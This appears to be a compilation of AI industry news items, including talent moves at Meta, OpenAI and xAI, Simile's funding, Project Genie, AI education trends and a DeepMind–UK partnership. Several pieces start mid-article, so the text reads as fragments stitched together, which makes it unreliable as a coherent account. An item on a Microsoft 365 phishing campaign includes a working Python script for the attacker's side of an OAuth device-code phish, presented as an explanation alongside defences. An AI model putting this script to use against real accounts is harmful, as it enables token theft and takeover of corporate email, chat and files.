Sam Altman reportedly courted Pang for months. Andrew Harnik/Getty Images
Ruoming Pang, a prominent A.I. researcher recruited by Meta last year with a pay package reportedly worth more than $200 million, has left the company to join OpenAI, The Information reported yesterday (Feb. 25). His departure marks another setback for Mark Zuckerberg’s elite A.I. team and underscores the escalating A.I. talent war. Pang joined Meta Superintelligence Labs (MSL) in July after being poached from Apple. He remained at Meta for only seven months.
Zuckerberg unveiled MSL in July 2025 as the centerpiece of Meta’s push to develop advanced A.I. systems. The lab quickly became the focus of an aggressive—and costly—hiring spree. Alexandr Wang, founder of Scale AI, now leads the group as Meta’s A.I. chief after Meta acquired 40 percent of his startup. Within MSL, a smaller, more secretive unit known as TBD Lab is tasked with building next-generation foundation models.
Pang is originally from Shanghai and earned his undergraduate degree from Shanghai Jiao Tong University. He holds a master’s in computer science from the University of Southern California and earned a Ph.D. from Princeton University in 2006. Over the course of his career, Pang has worked on some of the most consequential A.I. systems in the industry, making him one of the more sought-after engineers in the field.
At Apple, he spent nearly four years as a “senior distinguished engineer,” leading development of the foundation models behind Apple Intelligence. Before Apple, Pang spent roughly 15 years at Google as a principal software engineer, where he worked on large-scale machine learning systems, including privacy-preserving technologies and speech recognition.
OpenAI has not disclosed Pang’s title, scope of responsibilities or the terms of his compensation. The Sam Altman-led company reportedly courted him for months, so the package is likely substantial. OpenAI employees earn roughly $1.5 million in annual salary and equity, according to the Wall Street Journal. Pang is widely expected to continue working on foundation models and superintelligence research.
For Meta, Pang’s exit complicates Zuckerberg’s ambition to dominate the superintelligence race. The company has successfully recruited high-profile researchers from OpenAI, Google and Anthropic. However, MSL has also seen a steady stream of departures in recent months.
Other departures have been quieter but telling. Ethan Knight joined MSL for only a few weeks before moving to OpenAI last August—a stint so brief it never appeared on his LinkedIn profile. Bert Maher, a software engineer, left after 12 years at Meta to join Anthropic. Avi Verma, who had been expected to join Meta from OpenAI, ultimately backed out.
Pang’s move is the latest signal that Silicon Valley’s A.I. talent war is intensifying. Even as talk of an A.I. bubble grows louder and tech companies rely on increasingly complex financial structures to sustain lofty valuations, leaders like Zuckerberg, Altman and Anthropic’s Dario Amodei show little sign of restraint. Instead, they are offering compensation packages worth tens or even hundreds of millions of dollars to persuade top researchers that their vision for superintelligence will prevail.
More research on the threats of artificial intelligence (AI) “needs to be done urgently”, the boss of Google DeepMind has told BBC News. In an exclusive interview at the AI Impact Summit in Delhi, Sir Demis Hassabis said the industry wanted “smart regulation” for “the real risks” posed by the tech. Many tech leaders and politicians at the Summit have called for more global governance of AI, ahead of an expected joint statement as the event draws to a close. But the US has rejected this stance, with White House technology adviser Michael Kratsios saying: “AI adoption cannot lead to a brighter future if it is subject to bureaucracies and centralised control.” BBC
Elon Musk is suing the EU over a landmark €120m (£105m) fine against his social media company X, accusing Brussels officials of bias. X launched an appeal against December’s fine at the EU General Court earlier this week, in what is the first legal challenge to Europe’s tough digital laws. The challenge will escalate a row between Mr Musk, Brussels and the White House after the Trump administration claimed EU policies are suppressing free speech. Telegraph
Mind is launching a significant inquiry into artificial intelligence and mental health after a Guardian investigation exposed how Google’s AI Overviews gave people “very dangerous” medical advice. In a year-long commission, the mental health charity, which operates in England and Wales, will examine the risks and safeguards required as AI increasingly influences the lives of millions of people affected by mental health issues worldwide. Guardian
An ongoing phishing campaign is targeting Microsoft 365 users by abusing OAuth tokens to gain long-term access to corporate data. The campaign focuses on business users in North America and aims to compromise Outlook, Teams and OneDrive without directly stealing passwords. Instead of attacking login pages with fake forms, the operators trick victims into completing a real sign-in process on Microsoft’s own device login portal, which makes the attack harder for both users and basic security tools to spot. Cybersecuritynews
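To see why this is hard to spot, it helps to look at the legitimate OAuth 2.0 device authorization flow the attackers piggyback on. The sketch below uses Microsoft’s documented public endpoints; the client ID is a placeholder, and the point is that every URL the victim sees is genuine—only the delivery of the code is malicious:

```python
import time
import requests  # third-party: pip install requests

TENANT = "common"
CLIENT_ID = "<client-id>"          # placeholder; campaigns reportedly reuse well-known client IDs
SCOPE = "offline_access Mail.Read"

# Step 1: request a device code from the documented Microsoft endpoint.
dc = requests.post(
    f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/devicecode",
    data={"client_id": CLIENT_ID, "scope": SCOPE},
).json()

# The response includes a short user_code and the genuine verification URL.
# The phish consists of sending the victim this real URL and code.
print(dc["message"])

# Step 2: poll the token endpoint until the victim finishes signing in.
while True:
    tok = requests.post(
        f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token",
        data={
            "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
            "client_id": CLIENT_ID,
            "device_code": dc["device_code"],
        },
    ).json()
    if "access_token" in tok:      # attacker now holds OAuth tokens; no password was captured
        break
    if tok.get("error") != "authorization_pending":
        raise RuntimeError(tok)    # expired_token, access_denied, etc.
    time.sleep(dc["interval"])
```

Because every page the victim interacts with really is Microsoft’s, defenses tend to rely on conditional access policies and restricting which clients may use the device-code grant, rather than on spotting fake login pages.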
Microsoft has confirmed that a bug allowed its Copilot AI to summarize customers’ confidential emails for weeks without permission. The bug, first reported by Bleeping Computer, let Copilot Chat read and outline the contents of emails since January, even when customers had data loss prevention policies meant to keep their sensitive information out of Microsoft’s large language model. Copilot Chat allows paying Microsoft 365 customers to use the AI-powered chat feature in its Office software products, including Word, Excel and PowerPoint. Techcrunch
If you want an even better AI model, there could be reason to celebrate. Google, on Thursday, announced the release of Gemini 3.1 Pro, characterizing the model’s arrival as “a step forward in core reasoning.” Measured by the release cadence of machine learning models, Gemini 3.1 Pro is hard on the heels of recent model debuts from Anthropic and OpenAI. There’s barely enough time to start using new US commercial AI models before a competitive alternative surfaces. And that’s to say nothing about the AI models coming from outside the US, like Qwen3.5. TheRegister
A.I. pioneer Fei-Fei Li is lending her support to Simile’s effort to simulate human behavior at scale. John Nacion/Variety via Getty Images
Every three months, public companies brace for analyst questions during quarterly earnings calls. But what if firms could predict these queries in advance and rehearse their responses? That’s one of the capabilities touted by Simile, a new A.I. startup spun out of Stanford and backed by acclaimed researcher Fei-Fei Li and OpenAI co-founder Andrej Karpathy.
Simile emerged from stealth yesterday (Feb. 12) with $100 million in funding from a round led by Index Ventures. Alongside Li and Karpathy, the startup—which hasn’t disclosed its valuation—also counts investors including Quora co-founder Adam D’Angelo and Scott Belsky, a partner at A24 Films.
Li and Karpathy both have close ties to Simile’s founding team, which includes Stanford researchers Joon Park, Percy Liang and Michael Bernstein. Li is the co-director of Stanford’s Human-Centered A.I. Institute and advised Karpathy during his Ph.D. study at the university. She is widely known for foundational work such as ImageNet, a large-scale image database that helped drive major breakthroughs in computer vision. Karpathy and Bernstein also contributed to that project.
Simile’s mission of using A.I. to reflect and model societal behavior taps into an underexplored research area, according to Karpathy, who previously worked at OpenAI and Tesla before launching his own education-focused A.I. startup. While large language models typically present a single, cohesive personality, Karpathy argues they are actually trained on data drawn from vast numbers of people. “Why not lean into that statistical power: Why simulate one ‘person’ when you could try to simulate a population?” he wrote in a post on X.
That idea underpins Simile’s broader goal. The Palo Alto-based startup aims to simulate the real-world effects of major decisions, from public policy to product launches, across virtual populations that mirror human behavior. The team has already tested this concept on a smaller scale through projects like Smallville, a 2023 Stanford experiment in which 25 autonomous A.I. agents interacted in a virtual environment.
Now, Simile is scaling the approach for business use. After spending the past seven months developing its model, the company is already working with clients on applications ranging from product development to litigation forecasting. CVS Health Corporation, for example, uses Simile to create simulated focus groups, while Gallup uses the platform to build digital polling panels. For earnings calls, Simile can predict about 80 percent of the questions that analysts ultimately ask, said Park, the startup’s CEO, during a recent appearance on TBPN.
At present, Simile’s models are based on data from hundreds of thousands of people who have signed up for its studies. Over time, the company hopes to expand that to simulations representing the world’s entire population of roughly 8 billion people.
Simile joins a growing wave of A.I. companies focused on using simulation to model real-world scenarios. Much of the existing research in this space has centered on physical systems, such as robotics and autonomous vehicles, through “world model” platforms developed by firms like Google and Nvidia.
Wu and Ba’s exits appeared amicable. But lower-level employees have been more candid about internal tensions at the Musk-run startup. Several members of xAI’s technical staff have also left in recent weeks, according to their posts on X and LinkedIn.
“All A.I. labs are building the exact same thing, and it’s boring,” said Vahid Kazemi, who worked on xAI’s audio models, in a post on X. “I think there’s room for more creativity. So, I’m starting something new.”
In an interview with NBC News, Kazemi also criticized the company’s working culture, saying he regularly worked 12-hour days, including holidays and weekends.
Launched in March 2023 with a roster of industry veterans from companies like OpenAI, Google, Microsoft and Tesla, xAI will now operate as a wholly owned subsidiary of SpaceX. The newly combined company faces no shortage of challenges: Grok remains under legal scrutiny, and Musk’s leadership style is a continuing point of contention.
Here are the co-founders and notable leaders who have left xAI so far—and where they are now.
Jimmy Ba
Jimmy Ba, who led A.I. safety at xAI, announced his exit on Feb. 10. A professor at the University of Toronto who studied under A.I. pioneer Geoffrey Hinton, Ba did research that played a key role in shaping Grok’s development.
“So proud of what the xAI team has done and will continue to stay close as a friend of the team,” Ba wrote on X. He hasn’t announced his next move, but added that “2026 is gonna be insane and likely the busiest (and most consequential) year for the future of our species.”
Tony Wu
Tony Wu, a former research scientist at Google and postdoctoral researcher at Stanford University, announced his departure from xAI on Feb. 9.
Wu led xAI’s reasoning team. “It’s time for my next chapter…It is an era with full possibilities: a small team armed with AIs can move mountains and redefine what’s possible,” he wrote on X.
Wu has not disclosed his next role. Co-founders Guodong Zhang and Manuel Kroiss remain at xAI and are helping lead the company’s reorganization.
Mike Liberatore
While not a founding member, Mike Liberatore joined xAI as chief financial officer in April 2025, just one month after xAI acquired X in a deal that valued the combined company at $113 billion.
Liberatore has since departed; Musk replaced him with ex-Morgan Stanley banker Anthony Armstrong. Armstrong advised Musk on his Twitter (now X) acquisition in 2022 and later served as a senior advisor at the Office of Personnel Management during Musk’s controversial tenure at the Department of Government Efficiency (DOGE).
Greg Yang
Greg Yang spent nearly six years as a researcher at Microsoft before joining xAI’s founding team. He left the company in January due to health complications from Lyme disease.
“Likely I contracted Lyme a long time ago, but until I pushed myself hard building xAI and weakened my immune system, the symptoms weren’t noticeable,” Yang wrote on X. He continues to advise xAI in an informal capacity.
Igor Babuschkin
Igor Babuschkin, a former research engineer at OpenAI and Google DeepMind, was a co-founder and key engineering lead at xAI. Widely known as the primary developer behind Grok, Babuschkin left in July 2025 to start his own venture capital firm, Babuschkin Ventures, focused on A.I. research and startups.
Christian Szegedy
Christian Szegedy spent 12 years at Google before joining xAI as a founding research scientist. He left xAI in February 2025 to become chief scientist at superintelligence cloud company Morph Labs.
He subsequently departed that role to found mathematical A.I. startup Math Inc. in September, according to his LinkedIn.
Kyle Kosic
Kyle Kosic left OpenAI in early 2023 after two years to co-found xAI, where he served as engineering infrastructure lead. He departed about a year later, in April 2024, to return to OpenAI as a technical staff member.
Kosic was the first co-founder to leave xAI and did not issue a public statement. It is unclear who now leads xAI’s engineering infrastructure, though another co-founder, Ross Nordeen, remains the company’s technical program manager after previously holding the same role at Tesla.
Darren Aronofsky used to be a director who made interesting, if sometimes polarizing, films like Black Swan, Mother!, Noah, and The Wrestler. But it seems like a safe bet that people won’t need to debate whether Aronofsky’s new project is any good. Because anyone with eyes can see that it looks like low-effort AI slop. To put it another way, it looks like absolute dogshit.
Aronofsky is producing a new short-form series with his AI production company Primordial Soup titled “On This Day… 1776,” according to the Hollywood Reporter. The series uses tech from Google DeepMind to create short videos about the Revolutionary War, published on the YouTube channel for Time magazine. In 2018, Salesforce founder Marc Benioff bought Time, and the cloud software giant is sponsoring this monstrosity of a series.
The series uses human voice actors who belong to the Screen Actors Guild (SAG), which is clearly an attempt to tamp down the inevitable backlash from both inside and outside Hollywood. Folks inside the movie and TV industry have fiercely pushed back against the use of AI to replace the skilled artists and actors who create the media we watch. That concern obviously comes from a place of self-interest, because nobody wants to be pushed out of a job. But they also care about the quality of the work being produced. And there’s been a revolt among average consumers, too—people who’ve been inundated with the lowest-grade AI garbage imaginable. It’s really everywhere now.
The first episode, titled “The Flag,” is three-and-a-half minutes long and attempts to tell the story of George Washington raising the Continental Union Flag in Somerville, Massachusetts. It offers nothing compelling in the way of narrative. It’s the kind of thing that you’d skip over as a cut-scene in a particularly bad video game.
Everything has a dead and creepy quality, as the actors’ audio is poorly synced with the lips of the AI concoctions.
Have you ever seen a Spaghetti Western from the 1960s where the audio just doesn’t seem to match, even though it was clearly shot with actors speaking English, and the “dub” is in English? That happened because the audio was added in post-production, a result of direct sound recording being expensive in Italy during the post-war era. You get the same effect here, though there’s no good reason. Well, no good reason outside of presumably saving a ton of money on hiring human actors.
The second episode, titled “Common Sense,” tries to tell the story of Thomas Paine writing Common Sense. Benjamin Franklin makes an appearance, and his likeness proves that the most recognizable founding fathers come out looking the weirdest in this series.
The episode jumps around incoherently, much like the first episode, without grounding the viewer in anything we should care about. It’s truly an ugly mess. And if you bother to pause the scenes, you can spot the kind of telltale anomalies that plague other AI-generated video projects, like strangely deformed hands in the background characters. Hands are always giving this stuff away.
Then there are the words that appear on screen in the trailer, like the pamphlet that’s supposed to include the word “America” but instead reads something closer to “Λamereedd.”
The series is specifically made for this sestercentennial year of America’s founding, and each episode will reportedly drop on the 250th anniversary of the events it depicts, according to the Hollywood Reporter. That would certainly be a fun concept if the final product were something worth watching. But it’s not. It’s garbage. The people making and distributing it obviously don’t think so.
“This project is a glimpse at what thoughtful, creative, artist-led use of AI can look like — not replacing craft, but expanding what’s possible and allowing storytellers to go places they simply couldn’t before,” Ben Bitonti, president of Time Studios, told the Hollywood Reporter.
The reaction on social media hasn’t been so kind. “I know my expectations were low but holy fuck Darren Aronofsky producing AI slop wasn’t on my bingo card,” one X user wrote. Over on Bluesky another joked, “Used to be that when Darren Aronofsky wanted to feature a dead-eyed actor, he’d just employ Jared Leto.”
And other users have been picking apart all the anomalies, with one Bluesky critic writing: “Love the new Aronofsky scene where the colonist takes off his hat to cheer, revealing that underneath it was a second and somehow larger hat.”
“Nothing represents The End of America after a 250-year run quite like using AI slop to depict the creation of the Declaration of Independence,” another user quipped.
The videos have been up on Time’s YouTube channel for over seven hours as of this writing, but they’re not gaining much attention in their original format. The first episode has just 5,000 views; the second, a little over 2,000. Social media posts ridiculing the production are faring better. One video on Bluesky has over 2,500 quote posts, almost all of them joking about how awful it looks.
Gizmodo reached out to Ken Burns for comment, but didn’t immediately receive a reply.
Google DeepMind is opening up access to Project Genie, its AI tool for creating interactive game worlds from text prompts or images.
Starting Thursday, Google AI Ultra subscribers in the U.S. can play around with the experimental research prototype, which is powered by a combination of Google’s latest world model Genie 3, its image generation model Nano Banana Pro, and Gemini.
Coming five months after Genie 3’s research preview, the move is part of a broader push to gather user feedback and training data as DeepMind races to develop more capable world models.
World models are AI systems that generate an internal representation of an environment, and can be used to predict future outcomes and plan actions. Many AI leaders, including those at DeepMind, believe world models are a crucial step to achieving artificial general intelligence (AGI). But in the nearer term, labs like DeepMind envision a go-to-market plan that starts with video games and other forms of entertainment and branches out into training embodied agents (aka robots) in simulation.
“I think it’s exciting to be in a place where we can have more people access it and give us feedback,” Shlomi Fruchter, a research director at DeepMind, told TechCrunch via video interview, smiling ear-to-ear in clear excitement over Project Genie’s release.
DeepMind researchers that TechCrunch spoke to were upfront about the tool’s experimental nature. It can be inconsistent, sometimes impressively generating playable worlds, other times producing baffling results that miss the mark. Here’s how it works.
A claymation-style castle in the sky made of marshmallows and candy. Image Credits: TechCrunch
You start with a “world sketch” by providing text prompts for both the environment and a main character, whom you will later be able to maneuver through the world in either first or third person view. Nano Banana Pro creates an image based on the prompts that you can, in theory, modify before Genie uses the image as a jumping off point for an interactive world. The modifications mostly worked, but the model occasionally stumbled and would give you purple hair when you asked for green.
You can also use real life photos as a baseline for the model to build a world on, which, again, was hit or miss. (More on that later.)
Once you’re satisfied with the image, it takes a few seconds for Project Genie to create an explorable world. You can also remix existing worlds into new interpretations by building on top of their prompts, or explore curated worlds in the gallery or via the randomizer tool for inspiration. You can then download videos of the world you just explored.
DeepMind is only granting 60 seconds of world generation and navigation at the moment, in part due to budget and compute constraints. Because Genie 3 is an auto-regressive model, it takes a lot of dedicated compute – which puts a tight ceiling on how much access DeepMind is able to provide to users.
“The reason we limit it to 60 seconds is because we wanted to bring it to more users,” Fruchter said. “Basically when you’re using it, there’s a chip somewhere that’s only yours and it’s being dedicated to your session.”
He added that extending it beyond 60 seconds would diminish the incremental value of the testing.
“The environments are interesting, but at some point the level of interaction and the dynamism of the environment is somewhat limited. Still, we see that as a limitation we hope to improve on.”
Whimsy works, realism doesn’t
Google received a cease-and-desist from Disney last year, so Project Genie won’t generate Disney-related worlds. Image Credits: TechCrunch
When I used the model, the safety guardrails were already up and running. I couldn’t generate anything resembling nudity, nor could I generate worlds that even remotely sniffed of Disney or other copyrighted material. (In December, Disney hit Google with a cease-and-desist, accusing the firm’s AI models of copyright infringement by training on Disney’s characters and IP and generating unauthorized content, among other things.) I couldn’t even get Genie to generate worlds of mermaids exploring underwater fantasy lands or ice queens in their wintery castles.
Still, the demo was deeply impressive. The first world I built was an attempt to live out a small childhood fantasy, in which I could explore a castle in the clouds made up of marshmallows with a chocolate sauce river and trees made of candy. (Yes, I was a chubby kid.) I asked the model to do it in claymation style, and it delivered a whimsical world that childhood me would have eaten up, the castle’s pastel-and-white colored spires and turrets looking puffy and tasty enough to rip off a chunk and dunk it into the chocolate moat. (Video above.)
A “Game of Thrones”-inspired world that failed to generate as photo-realistically as I wanted. Image Credits: TechCrunch
That said, Project Genie still has some kinks to work out.
The model excelled at creating worlds based on artistic prompts, like watercolors, anime style or classic cartoon aesthetics. But it tended to fail when it came to photorealistic or cinematic worlds, which often came out looking like a video game rather than real people in a real setting.
It also didn’t always respond well when given real photos to work with. When I gave it a photo of my office and asked it to create a world based on the photo exactly as it was, it gave me a world that had some of the same furnishings of my office – a wooden desk, plants, a grey couch – laid out differently. And it looked sterile, digital, not lifelike.
When I fed it a photo of my desk with a stuffed toy, Project Genie animated the toy navigating the space, and even had other objects occasionally react as it moved past them.
That interactivity is something DeepMind is working on improving. There were several occasions when my characters walked right through walls or other solid objects.
I asked Project Genie to animate a stuffed toy (Bingo Bronson) so it could explore my desk. Image Credits: TechCrunch
When DeepMind released Genie 3 initially, researchers highlighted how the model’s auto-regressive architecture meant that it could remember what it had generated, so I wanted to test that by returning to parts of the environment it generated already to see if it would be the same. For the most part, the model succeeded. In one case, I generated a cat exploring yet another desk, and only once when I turned back to the right side of the desk did the model generate a second mug.
The part I found most frustrating was navigating the space, using the arrows to look around, the spacebar to jump or ascend, and the W-A-S-D keys to move. I’m not a gamer, so this didn’t come naturally to me, but the keys were often non-responsive, or they sent me in the wrong direction. Trying to walk from one side of the room to a doorway on the other side often became a chaotic zigzagging exercise, like trying to steer a shopping cart with a broken wheel.
Fruchter assured me that his team was aware of these shortcomings, reminding me again that Project Genie is an experimental prototype. In the future, he said, the team hopes to enhance the realism and improve interaction capabilities, including giving users more control over actions and environments.
“We don’t think about [Project Genie] as an end-to-end product that people can go back to everyday, but we think there is already a glimpse of something that’s interesting and unique and can’t be done in another way,” he said.
From infrastructure battles to physical-world intelligence, A.I.’s next chapter is already taking shape. Unsplash
In November, ChatGPT turned three, with a global user base rapidly approaching one billion. At this point, A.I. is no longer an esoteric acronym that needs explaining in news stories. It has become a daily utility, woven into how we work, learn, shop and even love. The field is also far more crowded than it was just a few years ago, with competitors emerging at every layer of the stack.
Over the past year, conversation around A.I. has taken on a more complicated tone. Some argue that consumer chatbots are nearing a plateau. Others warn that startup valuations are inflating into a bubble. And, as always, there’s the persistent anxiety that A.I. may one day outgrow human control altogether.
So what comes next? Much of the industry’s energy is now focused on the infrastructure side of A.I. Big Tech companies are racing to solve the hardware bottlenecks that limit today’s systems, while startups experiment with applications far beyond chatbots. At the same time, researchers are beginning to look past language models altogether, toward models that can reason about the physical world.
Below are the key themes Observer has identified over the past year of covering this space. Many of these developments are still unfolding and are likely to shape the field well into 2026 and beyond.
A.I. chips
Even as OpenAI faces growing competition at the model level, its primary chip supplier, Nvidia, remains in a league of its own. Demand for its GPUs continues to outstrip supply, and no rival has yet meaningfully disrupted its dominance. Traditional semiconductor companies such as AMD and Intel are racing to claw back market share, while some of Nvidia’s largest customers are designing their own chips to reduce dependence on a single supplier.
To borrow from philosopher Ludwig Wittgenstein, the limits of language are the limits of our world. Today’s A.I. systems have grown remarkably fluent in human language—especially English—but language captures only a narrow slice of intelligence. That limitation has prompted some researchers to argue that large language models alone can never reach human-level understanding.
That belief is fueling a push toward so-called “world models,” which aim to teach machines how the physical world works—how objects move, how space is structured, and how cause and effect unfold. Yann LeCun, Meta’s longtime chief A.I. scientist and one of the most vocal of those skeptics, is now leaving the company to build such a system himself. Fei-Fei Li’s startup, World Labs, unveiled its first model in November after nearly two years of development. Google DeepMind has released early versions through its Genie projects, and Nvidia is betting heavily on physical A.I. with its Cosmos models.
Language-specific A.I.
While pioneering researchers look beyond language, linguistic barriers remain one of A.I.’s most practical challenges. More than half of the internet’s content is written in English, skewing training data and limiting performance in other languages.
Wearable A.I.
It’s only natural that A.I. has a consumer hardware angle. This year brought a wave of experiments in wearable A.I.—some met with curiosity, others with discomfort.
Friend, a startup selling an A.I. pendant, sparked backlash after a New York City subway campaign framed its product as a substitute for human companionship. In December, Meta acquired Limitless, the maker of a $99 wearable that records and summarizes conversations. Earlier in the year, Amazon bought Bee, which produces a $50 bracelet designed to transcribe daily activity and generate summaries.
Meta is also developing a new line of smart glasses with EssilorLuxottica, the company behind Ray-Ban and Oakley. In July, Mark Zuckerberg went so far as to suggest that people without A.I.-enhanced glasses could eventually face a “significant cognitive disadvantage.” Meanwhile, OpenAI is quietly collaborating with former Apple design chief Jony Ive on a mysterious hardware project of its own. This all suggests the next phase of A.I. may be something we wear, not just something we type into.
Universities are rapidly expanding A.I. programs as students seek skills that can withstand an increasingly automated future. Photo by: Jumping Rocks/Universal Images Group via Getty Images
When Chris Callison-Burch first started teaching an A.I. course at the University of Pennsylvania in 2018, his inaugural class had about 100 students. Seven years later, enrollment has swelled to roughly 400—excluding another 250 students attending remotely and an additional 100 to 200 on the waiting list. The professor now teaches in the largest classroom on campus. If his course grew any bigger, he’d need to move into the school’s sports stadium.
“I would love to think that’s all because I’m a dynamic lecturer,” Callison-Burch told Observer. “But it’s really a testament to the popularity of the field.”
Demand for A.I. courses and degrees has soared across higher education as the technology plays an increasingly central role in daily life and begins to encroach on once-popular fields like computer science. Amid uncertainty about the future of the labor market, students are seeking to prepare for an A.I.-dominated economy by immersing themselves in the field.
Universities have followed suit. Schools like Carnegie Mellon and Purdue University are among a number offering undergraduate or graduate degrees in A.I., a trend expected to accelerate in the coming years. The University of Pennsylvania recently became the first Ivy League school to offer both undergraduate and graduate A.I. programs. Its graduate curriculum includes courses in natural language processing and machine learning, in addition to required classes on technology ethics and the broader legal landscape.
The demand is widespread. The University at Buffalo’s A.I. master’s program enrolled 103 students last year, up from just five in its inaugural 2020 cohort. At the Massachusetts Institute of Technology, undergraduate enrollment in A.I. has jumped from 37 students in 2022 to more than 300. Miami Dade College has seen a 75 percent increase in enrollment in its A.I. programs since 2022, while its other programs have remained relatively steady aside from a “slight decrease in computer science,” the school told Observer.
Callison-Burch, who also serves as faculty director of Penn’s online A.I. master’s program, has noticed a similar decline. “There’s an interesting trend at the moment where it looks like computer science enrollment is dipping,” he said, pointing to increased A.I.-powered automation across the field. More than 60 percent of undergraduate computing programs saw a decline in enrollment for the 2025-2026 year compared to the year prior, according to a recent report from the Computing Research Association.
That decline comes as A.I. reshapes some of the professions most exposed to its advances. In fields like coding, early-career workers have already experienced a 13 percent relative decline in employment, according to an August research paper from Stanford.
Yann LeCun, Meta’s former chief A.I. scientist, advises young people to become adept at learning itself, as their job is “almost certainly going to change” over time. “My suggestion is to take courses on topics that are fundamental and have a long shelf life,” he told Observer via email, pointing to mathematics, physics and engineering as core areas of focus.
It’s not just students grappling with these shifts. Callison-Burch noted that professors, too, are trying to adapt and determine how best to integrate A.I. into their classrooms. One thing, he said, is certain: the technology will only become more pervasive. That makes it all the more important for young people to familiarize themselves with its tools.
Even so, he acknowledged that predicting how A.I. will reshape the labor market remains extraordinarily difficult, making it hard for students to bet confidently on any one path. “I don’t think there’s an easy way of picking something that’s going to be future-proof, when we can’t yet see that future,” he said.
Samsung has announced that it “aims to be the first” to natively integrate Google Photos into TVs. The aim is for Google Photos to work seamlessly with Samsung’s souped-up version of Bixby. This would help make user photos part of the day-to-day TV experience, with photos appearing while navigating the TV’s OS during “contextual and convenient moments.”
The company says users will be able to explore their Google Photos libraries in three new experiences. The first is called Memories, and will show curated stories based on “people, locations and meaningful moments.” This has a planned launch in March 2026 and will be exclusive to Samsung TVs for six months.
Create with AI will use an image generation and editing model, enabling users to transform their photos with themed templates. Users will also be able to turn any still image into a short video using the tool. Create with AI has a planned launch in the second half of 2026.
Finally, Personalized Results will create themed slideshows of users’ photos based on particular topics or the content of an image. Examples given by Samsung include the ocean, hiking and Paris. This also has a planned launch in the latter part of 2026.
AI lab Google DeepMind announced a major new partnership with the U.K. government Wednesday, pledging to accelerate breakthroughs in materials science and clean energy, including nuclear fusion, and to conduct joint research on the societal impacts of AI and on ways to make AI decision-making more interpretable and safer.
As part of the partnership, Google DeepMind said it would open its first automated research laboratory in the U.K. in 2026. That lab will focus on discovering advanced materials including superconductors that can carry electricity with zero resistance. The facility will be fully integrated with Google’s Gemini AI models. Gemini will serve as a kind of scientific brain for the lab, which will also use robotics to synthesize and characterize hundreds of materials per day, significantly accelerating the timeline for transformative discoveries.
The company will also work with the U.K. government and other U.K.-based scientists on trying to make breakthroughs in nuclear fusion, potentially paving the way for cheaper, cleaner energy. Fusion reactions promise abundant power with little to no nuclear waste, but they have proved very difficult to sustain or scale up.
Additionally, Google DeepMind is expanding its research alliance with the government-run U.K. AI Security Institute to explore methods for discovering how large language models and other complex neural network-based AI models arrive at decisions. The partnership will also involve joint research into the societal impacts of AI, such as the effect AI deployment is likely to have on the labor market and the impact increased use of AI chatbots may have on mental health.
British Prime Minister Keir Starmer said in a statement that the partnership would “make sure we harness developments in AI for public good so that everyone feels the benefits.”
“That means using AI to tackle everyday challenges like cutting energy bills thanks to cheaper, greener energy and making our public services more efficient so that taxpayers’ money is spent on what matters most to people,” Starmer said.
Google DeepMind cofounder and CEO Demis Hassabis said in a statement that AI has “incredible potential to drive a new era of scientific discovery and improve everyday life.”
As part of the partnership, British scientists will receive priority access to Google DeepMind’s advanced AI tools, including AlphaGenome for DNA sequencing; AlphaEvolve for designing algorithms; DeepMind’s WeatherNext weather forecasting models; and its new AI co-scientist, a multi-agent system that acts as a virtual research collaborator.
DeepMind was founded in London in 2010 and is still headquartered there; it was acquired by Google in 2014.
Gemini’s U.K. footprint expands
The collaboration also includes potential development of AI systems for education and government services. Google DeepMind will explore creating a version of Gemini tailored to England’s national curriculum to help teachers reduce administrative workloads. A pilot program in Northern Ireland showed that Gemini helped save teachers an average of 10 hours per week, according to the U.K. government.
For public services, the U.K. government’s AI Incubator team is trialing Extract, a Gemini-powered tool that converts old planning documents into digital data in 40 seconds, compared to the current two-hour process.
The expanded research partnership with the U.K. AI Security Institute will focus on three areas, the government and DeepMind said: developing techniques to monitor AI systems’ so-called “chain of thought”—the reasoning steps an AI model takes to arrive at an answer; studying the social and emotional impacts of AI systems; and exploring how AI will affect employment.
U.K. AISI currently tests the safety of frontier AI models, including those from Google DeepMind and a number of other AI labs, under voluntary agreements. But the new research collaboration could potentially raise concerns about whether the U.K. AISI will remain objective in its testing of its now-partner’s models.
In response to a question on this from Fortune, William Isaac, principal scientist and director of responsibility at Google DeepMind, did not directly address the issue of how the partnership might affect the U.K. AISI’s objectivity. But he said the new research agreement puts in place “a separate kind of relationship from other points of interaction.” He also said the new partnership was focused on “questions on the horizon” rather than present models, and that the researchers would publish the results of their work for anyone to review.
Isaac said there is no financial or commercial exchange as part of the research partnership, with both sides contributing people and research resources.
“We’re excited to announce that we’re going to be deepening our partnership with the U.K. AISI to really focus on exploring, really the frontier research questions that we believe are going to be important for ensuring that we have safe and responsible development,” he said.
He said the partnership will produce publicly accessible research focused on foundational questions—such as how AI impacts jobs or how talking to chatbots affects mental health—rather than policy-specific recommendations, though the findings could influence how businesses and policymakers think about AI and how to regulate it.
“We want the research to be meaningful and provide insights,” Isaac said.
Isaac described the U.K. AISI as “the crown jewel of all of the safety institutes” globally and said deepening the partnership “sends a really strong signal” about the importance of engaging responsibly as AI systems become more widely adopted.
The partnership also includes expanded collaboration on AI-enhanced approaches to cybersecurity. This will include the U.K. government exploring the use of tools like Big Sleep, an AI agent developed by Google that autonomously hunts for previously unknown “zero-day” cybersecurity exploits, and CodeMender, another AI agent that can search for and then automatically patch security vulnerabilities in open source software.
British Technology Secretary Liz Kendall is visiting San Francisco this week to further the U.K.-U.S. Tech Prosperity Deal, which was agreed to during U.S. President Trump’s state visit to the U.K. in September. In November alone, the British government said, the pact helped secure more than $32.4 billion of private investment committed to the U.K. tech sector.
The Google-U.K. partnership builds on a £5 billion ($6.7 billion) investment commitment from Google made earlier this year to support U.K. AI infrastructure and research, and to help modernize government IT systems.
The British government also said the collaboration supports its AI Opportunities Action Plan and its £137 million AI for Science Strategy, which aims to position the U.K. as a global leader in AI-driven research.
Alphabet (GOOG) shares rose 2.1% after reports that Meta is in advanced talks to spend billions on Google’s TPU chips instead of NVIDIA GPUs.
Google TPUs are 2x cheaper than NVIDIA GPUs at standard 9,000-chip rack configurations.
NVIDIA lost roughly $250B in market value as Wall Street recognized TPUs as a legitimate alternative.
